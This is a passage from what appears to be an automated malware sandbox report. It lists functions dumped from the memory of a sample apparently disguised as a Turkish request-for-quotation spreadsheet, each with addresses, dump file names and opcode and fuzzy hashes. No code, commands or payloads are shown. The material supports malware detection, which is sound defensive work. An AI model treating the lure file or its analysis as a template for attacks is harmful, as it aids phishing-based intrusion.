Function 0785C548 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b20265496cae3148ed13a4ba813703998fef6a9bec5dbe6df183dcbef23fb48
Instruction ID: 3ebb4b1a99a0a38981dcf133fcf46ed61778f2e5d97340193091b51ba419f2dd
Opcode Fuzzy Hash: 6b20265496cae3148ed13a4ba813703998fef6a9bec5dbe6df183dcbef23fb48
Instruction Fuzzy Hash: 0251F3B4E0421D8FCB08CFE9C884AAEBBF6BF99300F109129D815AB355DB355906CF50

Function 07854338 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3fe7c80da46902872fa7711ad68643f616ef5af6301575bf4b039bfc07f7bf
Instruction ID: c0c9d2ac038ed3c309f0562b623b8154712229df9cecec40e87ce0a241f18529
Opcode Fuzzy Hash: de3fe7c80da46902872fa7711ad68643f616ef5af6301575bf4b039bfc07f7bf
Instruction Fuzzy Hash: D6511074A1161A8FCF14EFA8C8948ADF7B5FF99310B148669D809F7314EB34E985CB90

Function 0785762B Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d0c3c2b96aece48354a433fd90083e02b0fdecd3a2d1c42151d187c4ee2d9c
Instruction ID: 601fc7821e2158237e35dec5bcba688cd8a689642e30665a765977314192ee5f
Opcode Fuzzy Hash: 34d0c3c2b96aece48354a433fd90083e02b0fdecd3a2d1c42151d187c4ee2d9c
Instruction Fuzzy Hash: 7C510974A01219CFCB05EFA9E8849EEBBB2FF89301F108569E81567360DB395C15CB95

Function 0785159F Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 855a16b6257a7aa9d064199af09172492aa848b4bf8e7722d50fb240d28b4021
Instruction ID: ac34a09db6ad8364a08b0861b3b249ca572453c615be69d670e8e77e6dd306ca
Opcode Fuzzy Hash: 855a16b6257a7aa9d064199af09172492aa848b4bf8e7722d50fb240d28b4021
Instruction Fuzzy Hash: A14102F0E1422A9FDB02AF64C9992EE7BB0BB76344F540556DC42E72A5EA308911CBD1

Function 07857630 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f831d4eb201e5681bf307754e8050eb046565ab3590ce0f906bc06d9b12b1b90
Instruction ID: 32ed76923140c29e223206fc75a909dd9712a9a73d2675ea290bd811034ae072
Opcode Fuzzy Hash: f831d4eb201e5681bf307754e8050eb046565ab3590ce0f906bc06d9b12b1b90
Instruction Fuzzy Hash: 55511874A01219CFCB04EFA9E8849EEBBB2FF89301F108569E81577360CB399C15CB95

Function 0785432B Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a8e68d0fa307feca3e6df42598bffd7c4cf3d9b89c4c0fed45c505416241faa
Instruction ID: 089fa1b50d56b46130c14ef11a853b8337aaad619eefabf90870ddbc0e0d5c81
Opcode Fuzzy Hash: 3a8e68d0fa307feca3e6df42598bffd7c4cf3d9b89c4c0fed45c505416241faa
Instruction Fuzzy Hash: 53517375A0165ACFCF10DF68C8809ADF7B1FF99314B1486A9E809E7315EB34E985CB90

Function 078523D0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d89dfcadff1f6d5d8c5f4e248f1b4dc80f7b3f1da4ec13e4d946b01eaa0c6a6b
Instruction ID: 30d7aeab87aac6d0ee7607ea5e7c8570d476f16480f0c5c8dbf10d0fea00cfeb
Opcode Fuzzy Hash: d89dfcadff1f6d5d8c5f4e248f1b4dc80f7b3f1da4ec13e4d946b01eaa0c6a6b
Instruction Fuzzy Hash: 8441FDF0E1421B9FCB12AF64C8596EE7BB0BB66304F500466EC02E72A5EE348951CBC1

Function 0785CE27 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a282063b101bc7f1dfd7d74164a9d534b5bc131f46c3c76b014393a162634013
Instruction ID: da5869fc1539b8ccd97c7eeb7ca52314a99dda99be4e22160cb361adab65c6ab
Opcode Fuzzy Hash: a282063b101bc7f1dfd7d74164a9d534b5bc131f46c3c76b014393a162634013
Instruction Fuzzy Hash: 8E5158B490834ACFCB05CFA8C584AEEBFF5EB5A314F145199D809E7252D334A941DFA1

Function 0785CCA9 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e1b619a77a0a8d369d2370bf8929c43812d9660eba777410f7c8b8036e7644
Instruction ID: ee5b5da682f1d5e209b6b636d9ef6e4d90bd8512f38c43ce460803a80939020b
Opcode Fuzzy Hash: 93e1b619a77a0a8d369d2370bf8929c43812d9660eba777410f7c8b8036e7644
Instruction Fuzzy Hash: 3941F3B4D1820A8FDB08CFAAD4486EEBFF6AB9E304F14D06AD819E3251D7344941CF64

Function 0785835F Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cfbb5bdcc6d162d118ffeea27d363bc574c01e3bcd57a0b7006a1269599f98a
Instruction ID: d8eeac562d6cb1f5de17a013b45191e1a8fed89d3d9ea0c2406a532db4a305a9
Opcode Fuzzy Hash: 0cfbb5bdcc6d162d118ffeea27d363bc574c01e3bcd57a0b7006a1269599f98a
Instruction Fuzzy Hash: 5151D378E052089FCB45CFA8C890AADBBF2FB59314F24816AD819AB341DA359D42CF50

Function 078515C4 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c4eb7cc69699c9704bd8df924cd68789b72635ddafbaf6032bb297c47f326e
Instruction ID: af622862b6321c1fbed58f0a4104e021f2339b2a015babf04f22bb7bf3406907
Opcode Fuzzy Hash: 50c4eb7cc69699c9704bd8df924cd68789b72635ddafbaf6032bb297c47f326e
Instruction Fuzzy Hash: BA4193F0E2411B9BDB05AF69C8597EE7BF0BB65344F500426DC02E7295EE34C9518AD1

Function 0785DFB9 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2008735bc404f88314d2d68df3ac80f5827811d518c89df5de0bbdf6640306
Instruction ID: 65dd83e4edbf7cb508278fe06267d7e9414774b0c9fff901b2364bd6140dd3f7
Opcode Fuzzy Hash: 9b2008735bc404f88314d2d68df3ac80f5827811d518c89df5de0bbdf6640306
Instruction Fuzzy Hash: A1414BB4D19208DFCB14CF95D9809ADBBBAFF5E305F10959AE809EB215C7349A42CF50

Function 078507DF Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bcf04fd95ae6b34974c31d3125eb5dfbc741990c75e2c4ceca99549a1d96919
Instruction ID: 1b880b04a7813c6fb7966365a611a19cea29972f1bb79f11901524ae588b2b7a
Opcode Fuzzy Hash: 4bcf04fd95ae6b34974c31d3125eb5dfbc741990c75e2c4ceca99549a1d96919
Instruction Fuzzy Hash: 10414A70A012099FDB04DFA8D854AADBBB6FF99310F148569E841FB3A0DB70D941CB90

Function 078507E8 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9be78dd2bc445250783d9be7006986f7a2319fa573938494064766927792358
Instruction ID: 22a55329bdc915905ba82a7a98bb6e0afc185edf0b3e12926a859728f0503cdb
Opcode Fuzzy Hash: f9be78dd2bc445250783d9be7006986f7a2319fa573938494064766927792358
Instruction Fuzzy Hash: E0413A70A016099FDB04DFB9D854AADBBB6FF99310F148569E841FB3A0DB70A940CB90

Function 07854077 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86f12507f68774e2a6a80d6665e468fe62a42374fb644bfbbfa3d4730c272e3
Instruction ID: 8a547bc1ff88b5a782360c5b2818a76de89f34db12299b8e84eab9962bd5c0ee
Opcode Fuzzy Hash: c86f12507f68774e2a6a80d6665e468fe62a42374fb644bfbbfa3d4730c272e3
Instruction Fuzzy Hash: 8B418235A10619DFCB01EFA8C894CEDFBB5FF89300B048299E505AB321EB70AD45CB90

Function 07859B5B Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8a1db289217ad1bcae52702e5ca99a38e5b3a2386f87ab345696682de044cdf
Instruction ID: 80e0c845e9152953a2941b5f50f3181f5c55a496d01b92df5d3ca2a5fce16a95
Opcode Fuzzy Hash: a8a1db289217ad1bcae52702e5ca99a38e5b3a2386f87ab345696682de044cdf
Instruction Fuzzy Hash: 3541E8B8E14219DFDB04DFA8C580AAEBBF1FB99314F148069E816AB350D735AD02CF55

Function 07850BD3 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 962191de0b0efd5362a66cdabe6e8921406175f652ff11a7a9056c6b32ee3420
Instruction ID: e4a312c766930b64a0f2b7f1fb4a5654414900de01687074d07cff6cd30005d3
Opcode Fuzzy Hash: 962191de0b0efd5362a66cdabe6e8921406175f652ff11a7a9056c6b32ee3420
Instruction Fuzzy Hash: 174115B0A05219DFDF219FA5D9588ADFFB2FF84300F218259D845BB266CB3598A1CF40

Function 0785E398 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b0dcbcf6c005c9ef1682299a0baf34cf99614a3d86dbf38fc9ab849d80a8e17
Instruction ID: a5188874b4dc0a86a21a3416831ce92a8a9f86b30fae6320a134bb2f27732e70
Opcode Fuzzy Hash: 2b0dcbcf6c005c9ef1682299a0baf34cf99614a3d86dbf38fc9ab849d80a8e17
Instruction Fuzzy Hash: 5B318BB491820DEFC705DFA9C9449EDBBF9BF6A600F5491A5D848DF262D3309B04DB41

Function 07858ED8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a28ed2b2559628d1211a87afe2c6c66b10c1a7135e499c452f31cfd7a657b3a2
Instruction ID: 80397681ca3f1e39b419a8367c50820e7768e2f4da941a3b1b177f8343c272b3
Opcode Fuzzy Hash: a28ed2b2559628d1211a87afe2c6c66b10c1a7135e499c452f31cfd7a657b3a2
Instruction Fuzzy Hash: 123145B5900209AFCF14DFAAD844A9EBFF9EB48310F10842AE909E7310D775A950CFA1

Function 0785DF48 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29665b16cf711050942ffce1bd5f49083fadf1a912c677e06379970a9bced5ec
Instruction ID: f57ae07769df3ee01ff2c5ce26cab204c8033ada41860dbc21e66d466c84cc36
Opcode Fuzzy Hash: 29665b16cf711050942ffce1bd5f49083fadf1a912c677e06379970a9bced5ec
Instruction Fuzzy Hash: FE314DB4D19208DBDB48CF56D9445ADBBBAFF9E305F10D0A9E80A9B215C7349A41CF50

Function 078546F1 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6def630159af1233f8ac0f2414094fe084712db9d7d3f9205f21cfbcfd80e7d9
Instruction ID: 0c2c38905b9025db7426ae85be04d5a7343d6b78d370a38ee046374a9f7436f9
Opcode Fuzzy Hash: 6def630159af1233f8ac0f2414094fe084712db9d7d3f9205f21cfbcfd80e7d9
Instruction Fuzzy Hash: C0317331A10609DFCB01EFA8C8548DDBBB5FF89310F01869AE105AB275EB30AD49CB91

Function 07850AE8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26f621b31ac7db87e57e6ad93332ad70f740644f529ec26e53508760ab7cd255
Instruction ID: c32ce6d30f9c8b388001953686469426537b6c592aa348e84c311bbb9ec32acc
Opcode Fuzzy Hash: 26f621b31ac7db87e57e6ad93332ad70f740644f529ec26e53508760ab7cd255
Instruction Fuzzy Hash: A821F5B0F1421ACBCB216F74C9D86A9BBB1EF51308F60496AC846E7144FB31D910CBD2

Function 07856E18 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e26a1b732301b04f0c013c33480a5f1b66d9145f098d4aa3903a63b016c04bd
Instruction ID: 6c22353885fe16621350cd90ed466219224299690faf4338430da3d42275bb1e
Opcode Fuzzy Hash: 3e26a1b732301b04f0c013c33480a5f1b66d9145f098d4aa3903a63b016c04bd
Instruction Fuzzy Hash: A3218E71F0161A8FCB10EFA9C4446AEB7F1FF99610F50816AD819E7250FB309945CB91

Function 0120D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1560610602.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_120d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 651d5b28fd4e215fb6e70dd14cd1fc9e181aca62710590c44b475db257caeb8b
Instruction ID: 53d6727d155376a78afe8f981a05f5130e2f48348b45734f31f7215984f0feee
Opcode Fuzzy Hash: 651d5b28fd4e215fb6e70dd14cd1fc9e181aca62710590c44b475db257caeb8b
Instruction Fuzzy Hash: DC213371515208DFDB02DF94E8C0B26BF61FB88328F20C269ED090B287C336D406CBA2

Function 0120D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1560610602.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_120d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4cd0f61569abb704233d620efd5a94784bc81e093f4cd90b1b94a119a54b1bf
Instruction ID: 97a98fe2b288debbeb801c8960581858756b70d2db8610a6c99cbf5019f43538
Opcode Fuzzy Hash: d4cd0f61569abb704233d620efd5a94784bc81e093f4cd90b1b94a119a54b1bf
Instruction Fuzzy Hash: 76213675114308DFDB02DF84D9C0B56BF65FB84324F20C269E9090B287C376E446CBA2

Function 0141D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1561043209.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_141d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f790a5027f5497cd106b1922bdd94a14547b7156e930a9c92d3b969c37fbd7
Instruction ID: 39ff027969ff3973c9e2897c366211f9edc63780b840b464dc7107d0f221c6e3
Opcode Fuzzy Hash: 31f790a5027f5497cd106b1922bdd94a14547b7156e930a9c92d3b969c37fbd7
Instruction Fuzzy Hash: 4C2129B5A04304DFDB05DF94D9C8B56BBA5FB84324F20C66ED8494B36AC336D446CB61

Function 0141D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1561043209.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_141d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213943eb7e8ae83f642dee6fc24e8ceffb6d435a385ba7bbf0225c8dd1dbfd7a
Instruction ID: 14f955145258dff73bda5232b73e64d86859c521be9eb84448d8269d6bb7ba92
Opcode Fuzzy Hash: 213943eb7e8ae83f642dee6fc24e8ceffb6d435a385ba7bbf0225c8dd1dbfd7a
Instruction Fuzzy Hash: F62100F5A04300DFDB15DF54D988B16BFA1FB84218F20C56ED80A0B3AAC33AD447CA62

Function 0785D6A8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f73b190b3c6a69787a05c47f686d0f67c4b80add94fe1cabe393736f3de5e432
Instruction ID: 27c4c7402d6b27a2f5416934dd58478be8c31aa712f03aef2b1acdf1a29235f3
Opcode Fuzzy Hash: f73b190b3c6a69787a05c47f686d0f67c4b80add94fe1cabe393736f3de5e432
Instruction Fuzzy Hash: 9D2117F4A19259CBCB10CF54C5C4AADB7B9BB2A314F109696DC09EB352C730AD85CFA1

Function 07853F68 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a11990c5c216d6a0fac15fff9a7f04fc8617dfd190cea29554590155162249b
Instruction ID: 8cb27ce213d22428e47e49c68e33054957afb72e1a235b1aaf1a6f271a5dd3d1
Opcode Fuzzy Hash: 3a11990c5c216d6a0fac15fff9a7f04fc8617dfd190cea29554590155162249b
Instruction Fuzzy Hash: 27211275A0020A8FCF44EF69C8948EEF7B5FF89300B108569E905E7315EB30A945CBA0

Function 07853F63 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38628c983782c4ccb5be1e67a9a4657b841758c18b6dfb2f2ab680aac71fb4b2
Instruction ID: 68f6f2afb72811e40f3f7f0f8d021f5bfef55474bfa5e3b66f388cb0e7e59778
Opcode Fuzzy Hash: 38628c983782c4ccb5be1e67a9a4657b841758c18b6dfb2f2ab680aac71fb4b2
Instruction Fuzzy Hash: 7E213075B102098FCF54DF69D8948EEBBB5FF89300B148579E90AE7315EB30A945CBA0

Function 07859A63 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c356f29c80160688fab1fed6571384eb34268a45b15b689f79aae8ddb1a311b
Instruction ID: 45645bbbdc9f753008f8cbc0a1d116c6f914dc06842c8ca17446922c3fcf7684
Opcode Fuzzy Hash: 9c356f29c80160688fab1fed6571384eb34268a45b15b689f79aae8ddb1a311b
Instruction Fuzzy Hash: 1F21F5B4E1425ADFCB06CFAAC4509EEBBF5EB5A204F04846AE856F7340D7346905CBA1

Function 07854533 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 498c3c9963480b81dc873ba2ac99828090da49aff4f1c99938d72d6ae0dd4c52
Instruction ID: 730afa9ad434795a913db2a098f760a130772eed30c3bdeb2fde351a52caac15
Opcode Fuzzy Hash: 498c3c9963480b81dc873ba2ac99828090da49aff4f1c99938d72d6ae0dd4c52
Instruction Fuzzy Hash: 4D217F71A106489FCB05EF78D8544EEBBB4EF56310F00C27AEC09EB215EB309599DB91

Function 07851E5B Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b8986a32ff96c50d2d8902d573b77825c2d02a0f9ace88908ffc7c8f6ea3235
Instruction ID: c7b2a3e5ac0c327387a971898946154059340f00f11dec5bf1c1e70e97519a9a
Opcode Fuzzy Hash: 3b8986a32ff96c50d2d8902d573b77825c2d02a0f9ace88908ffc7c8f6ea3235
Instruction Fuzzy Hash: A721C0B5D0134A9FDB10DFAAD884ADEBBF4BB48214F14842EE919A7200C375A944CFA1

Function 07851E60 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b61cf8ac02771f2d9c154f36735ee50f4b0a654e59720d888dbc61c73617b0a
Instruction ID: 2c4bfdbd4f130bc2a452220e278d234ac540c524a1fc46170d3d67aedcb37b4a
Opcode Fuzzy Hash: 5b61cf8ac02771f2d9c154f36735ee50f4b0a654e59720d888dbc61c73617b0a
Instruction Fuzzy Hash: 7421DFB5D0134A9FDB10CF9AD884A9EFBF4BB48214F24842EE919A7200C775A944CBA4

Function 0141D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

